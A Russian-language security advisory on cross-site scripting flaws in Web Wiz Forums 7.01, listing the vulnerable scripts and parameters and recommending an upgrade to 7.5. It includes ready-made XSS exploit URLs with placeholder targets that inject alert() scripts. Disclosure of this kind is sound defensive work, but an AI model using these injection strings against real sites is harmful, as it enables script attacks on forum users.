Межсайтовый скриптинг в Web Wiz Forums
| Дата публикации: | 22.10.2003 |
| Всего просмотров: | 1780 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Web Wiz Forums ver. 7.01
Описание: Уязвимость обнаружена в Web Wiz Forums. Удаленный пользователь может выполнить XSS нападение. Уязвимость обнаружена в нескольких параметрах в сценариях forum_members.asp, members.asp, pm_buddy_list.asp и search.asp. Пример/Эксплоит:
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22
Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22
Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1
Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1
URL производителя:http://www.webwizforums.com Решение: Установите обновленную версию форума (7.5): http://www.webwizforums.com |
|
| Ссылки: | Web Wiz Forums ver. 7.01 |